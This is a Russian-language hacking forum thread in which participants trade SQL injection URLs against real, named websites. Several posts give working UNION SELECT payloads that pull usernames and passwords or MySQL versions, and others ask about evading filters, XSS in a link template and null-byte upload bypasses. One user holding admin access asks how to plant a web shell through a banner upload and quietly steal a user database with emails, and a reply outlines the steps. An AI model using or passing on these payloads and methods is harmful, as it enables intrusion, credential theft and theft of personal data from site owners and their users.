Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.
mailbrush - так и быть понтанусь LokbatanLi - )))ya toze pisy translitom Code: http://www.section404.org/news.php?id=1/**/and/**/1=0%20/**/union/**/all/**/select/**/0,0,0,concat_ws%280x3a,username,password%29,0,0/**/from/**/config--
http://www.discount.ru/search.html?find=-1%27&search=%E8%F1%EA%E0%F2%FC нашел. Это sql-inj илил нет? если да,помогите раскопать дальше
Code: http://www.discount.ru/search.html?find=1%27+and+1%3C0+or+version%28%29%3C4.1+and+version%28%29%3E3.9%2F*+&search=%E8%F1%EA%E0%F2%FC версия 4.0* полей 14, выводится 3е. Code: http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4%2F*&search=%E8%F1%EA%E0%F2%FC зы удаляйте пробелы в коде.
А ты сам попробуй раскрутить хоть какую-то скулю так... Не проканает, т.к. /**/ вместо пробела, и получится запрос Code: ...un ion ... И мускуль их интерпретирует как два разных оператора.
Есть html код в которо можно менять 2 параметра одновлеменно это {xss} Вопрос: как составить приавильно {xss} чтобы её небыло видно Условие: html теги ружиться, пробовал регистр менять, не помогло Code: <a href="{xss}" target="_blank" class="name">{xss}</a> И ещё 1 вопрос Сервер на *nix Есть форма для залива картинок, пробовал заливать картинки с именами img.php0x00.gif или img.php%00.gif Но они так и сохраняются на сервере. Вопрос: как можно попробовать обрезать тип файла и запустить как php (может я не правильно null байт применил?)
Здавствуйте помогите пожалуйста со скулой есть сайт выводит вот такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 5' я так понял тут нужно Limit использовать?
имею доступ в админку (root). Нужно слить оттуда всю бд юзеров и их мыльники. В админке, кроме как редактирования различных разделов,добавлений нвостей, опросов, ничего нет, типа dump database и т.д. Шелл? Но как чтобы не спалится? П.С. С шеллами дел почти не имел, поэтому, если этот метод в моем случае прокатит, то расскажите поподробнее)
лей шелл через админку (если это возможно), смотри конфиг подключения к бд, с шелла подключаешься к бд, сливаешь что тебе нужно.
как узнать возможно залить шелл или нет? В админке можно редактировать новости, а также есть система баннерной рекламы, где нужна ссылка на баннер, сам баннер, с моего компа( может быть именну тут и попробовать залить?) также можно выбрать с какого числа по которое показывать. Да, и как не спалится, если я сейчас через баннер залью шелл и как мне потом к шеллу коннектиться?))
ну например так: http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1 added http://www.sendas.org.ec /contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2)--&idP=0&lan=1
Code: http://www.sendas.org.ec/contenido.php?idM=%28-1%29union%28select%281%29,%282%29,%283%29,%284%29,%285%29,%286%29,%287%29,%288%29,%289%29,%28version%28%29%29,%281%29,%282%29%20%29--&idP=0&lan=1 без мочилова мозга мон и так Code: http://www.sendas.org.ec/contenido.php?idM=-1+union+all+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12&idP=0&lan=1
http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2 %2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4% 2F*&search=%E8%F1%EA%E0%F2%FC что дальше? что-то застрял..